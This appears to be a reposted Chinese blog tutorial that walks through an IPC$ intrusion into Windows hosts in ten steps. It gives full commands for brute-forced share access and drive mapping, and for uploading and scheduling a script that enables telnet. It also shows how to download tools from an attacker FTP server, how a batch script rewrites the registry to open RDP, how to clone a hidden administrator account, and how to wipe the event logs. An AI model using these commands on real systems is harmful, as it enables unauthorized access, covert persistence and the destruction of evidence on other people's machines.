IPC***

第一步：采用X-Scan掃描漏洞主機，選取開放139/445端口的主機為***對象，且主機存在弱口令或者知道主機的登錄賬戶和密碼。

第二步：建立IPC連接，使用如下命令。

???net??use??\\192.168.10.128\ipc$??"123456"??/user:"administrator"??(當用戶名和密碼不包括空格是可以省略"?"。

第三步：可以將主機的磁盤映射到本地。

?net?use?F:??\\192.168.10.128\C$??注意：遠程主機的C盤映射到本地的F盤

?net?use?H:??\\192.168.10.128\admin$??注意：遠程的windows\system32目錄映射到H盤

?第四步：上傳腳本telnet.bat，開啟telnet服務。

?????copy??telnet.bat??\\192.168.10..128\admin$?

telnet.bat的內容如下：

sc?config?tlntsvr?start=??auto?(start后有空格）

net?strat?"telnet"?

注意：一般情況telent服務是給禁止的，直接采用net?strat?"telnet"?命令不能啟動，要用sc服務配置命令改變服務的狀況后才能用net?strat?"telnet"?。

第五步：創建計劃執行telnet.bat腳本。

??????at??\\192.168.10.128?11:00??telnet.bat?

?第六步：用telnet遠程登錄目標主機。

??????Telnet?192.168.10.128?之后得到輸入用戶名和密碼的命令提示行

?第七步：登錄事先搭建好的ftp服務器或tftp服務器，下載開啟3389端口的腳本和管理賬戶克隆工具mt.exe或者AIO和日志清除工具elsave.exe?。

?????????>?ftp

?????????>open?192.16810.129?

?????????>mget?3389.bat??mt?.exe ?elsave.exe ? ?c:\ ?(下載3389.bat、mt.exe、elsave.exe到目標主機的C盤下)

注：3389.bat具體內容如下?

@echo off

?echo Windows Registry Editor Version 5.00>>3389.reg?

?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg?

?echo "fDenyTSConnections"=dword:00000000>>3389.reg?

?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg?

?echo "PortNumber"=dword:00000d3d>>3389.reg?

?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg?

?echo "PortNumber"=dword:00000d3d>>3389.reg

?regedit /s 3389.reg?

第八步：執行3389.bat腳本和mt.exe

????????mt?-clone??administrator?IUSR_XODU5PTT910NHOO

????????net?user?IUSR_XODU5PTT910NHOO?123456

第九步：克隆成功后，用IUSR_XODU5PTT910NHOO遠程登錄（mstsc)目標主機。?????

第十步：清除日志。

??????elsave??application??-C

??????elsave??system??-C

??????elsave??security??-C?

?

環境：上述事例是在目標主機沒有安裝殺毒軟件，沒有啟用防火墻的情況下。

錯誤代碼：

53 ? ?目標主機可能沒有啟用lanmanserver，其顯示名：Server

67 ??自己lanmanworkstation服務未啟動（顯示名：workstation）或者目標刪除了IPC$或者是低版本的系統無法向高版本的系統發起連接，XP無法向server2003發起連接，server2003無法向server?2008連接，但是高版本的可以向下發起連接。

1792??網絡登錄服務沒有啟動，即目標的NetLogon服務未啟動。

1326??未知的用戶名或錯誤密碼錯誤號1326，未知的用戶名或錯誤密碼

net?view?\\IP??查看對方開放的共享資源

net?time?\\IP?查看對方的時間

net?use?c:?/del?刪除映射的c盤，其他盤類推?
net?use?*?/del?/y刪除全部

轉載于:https://blog.51cto.com/xttlove/1033899

總結

以上是生活随笔為你收集整理的IPC***实例的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。